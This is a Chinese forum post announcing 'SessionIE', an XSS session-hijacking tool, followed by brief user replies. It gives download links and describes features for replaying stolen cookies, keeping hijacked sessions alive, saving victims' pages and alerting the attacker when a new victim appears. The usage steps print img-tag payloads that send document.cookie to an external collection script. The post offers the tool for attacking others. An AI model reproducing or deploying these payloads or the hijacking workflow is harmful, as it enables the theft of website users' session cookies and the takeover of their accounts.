SessionIE正式版
公开正式版,并停止更新。
下载地址:http://www.cncert.net/up_files/soft/sessionie-release.rar
演示地址:http://www.cncert.net/up_files/soft/sie.html
SessionIE 正式版
一、什么是 SessionIE
Sessionie是由CCTEAM开发团队开发的通用XSS辅助工具,可利用获取的COOKIE复制相同的http会话到本地以实现直接登录。
二、Sessionie能做什么
l Sessionie可以快速的利用XSS,而无需构造伪页面或代码等繁琐却不能重用的劳力
l Sessionie能即时的跟踪目标来源并进行 Session维持而保持Session的有效性
l Sessionie能结合特定的WEB服务以短信,邮件方式即时通知用户最新上线主机
三、功能特点
1.即时通知上线主机
2.两种COOKIE修改方式,允许将Cookie设置到外部的任意浏览器
3. 完善的导入导出功能
四、界面与说明
Sessionie为单一可执行程序,主界面如图
配置窗口
运行模式
sessionie( 具备session复制功能)
普通ie(正常的IE功能)
使用Pcap
不勾选则使用API模式,
勾选则使用pcap模式,需要设置网卡,该模式可将session设置到外部浏览器
建议使用api模式,当api设置COOKIE失败时可选用pcap模式
维持间隔
维持session的频率 单位为秒
保存结果
可用于无人值守时,自动保存劫持到的html内容,默认保存到report目录下,每个url默认保存两份。
爬虫深度(功能未开放)
用于无人值守时,自动保存劫持到的html的内容,并基于此session进行爬虫搜索的深度值。
相同URL重复次数
来源地址和COOKIE相同可重复出现的记录数
COOKIE脚本地址
用于收集cookie的脚本文件地址
例如:http://www.cncert.net/xss/xssc.asp
密码
Xssc脚本的密码
例如: www.cncert.net
短信提示
网址:用于接收Post数据的地址
表单内容:提交到上面网址的 post数据
注:配置文件为sysconfig.dll ,请不要手动修改配置文件,发生不可修复的错误时,请尝试删除配置文件。
五、如何使用Sessionie
1.修改下载的xsscu.asp里面的密码为你要设置的密码后上传ASP服务器。
2.打开Sessionie的配置窗口,设置好 COOKIE服务器地址和密码,选中Sessionie
3.构造
<img src=http://www.cncert.net/xss/xssc.asp?+document.cookie>
或者<img src=http://www.cncert.net/xss/xsscu.asp?+escape(document.cookie)>
类似语句到目标页面
4.当对方(必须和本地sessionie为不同的公网IP)访问你的XSS页面时候,Sessionie便会拾取到COOKIE
六、如何得到Sessionie
Thk!
真的。我被雷到了
终于发了、。。。
好东西
看来很强大!看下